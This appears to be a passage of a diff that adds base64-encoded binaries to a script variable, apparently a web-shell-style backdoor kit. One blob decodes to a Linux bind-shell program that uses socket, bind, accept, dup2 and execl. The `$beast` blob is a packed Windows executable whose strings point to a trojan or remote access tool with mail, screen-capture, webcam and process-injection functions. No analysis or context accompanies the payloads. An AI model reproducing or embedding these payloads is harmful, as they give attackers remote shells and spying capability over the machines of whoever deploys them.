+AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBibGFja2hvbGV1cGxvYWRy
+ZWFkeS5jAHN0cmNweQBwcmludGYAX0RZTkFNSUMAZXhlY2wAZHVwMgBzb2NrZXQAYnplcm8Ac2Vu
+ZABfaW5pdABhY2NlcHQAZW52aXJvbgBiaW5kAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZvAGVuZABf
+X3Byb2duYW1lAF9zdGFydABzaWduYWwAbGlzdGVuAGZvcmsAX19ic3Nfc3RhcnQAbWFpbgBfZmlu
+aQBhdGV4aXQAX2VkYXRhAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfZW5kAGV4aXQAc3RybGVuAF9f
+cmVnaXN0ZXJfZnJhbWVfaW5mbwBjbG9zZQA=";
+
+$beast="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
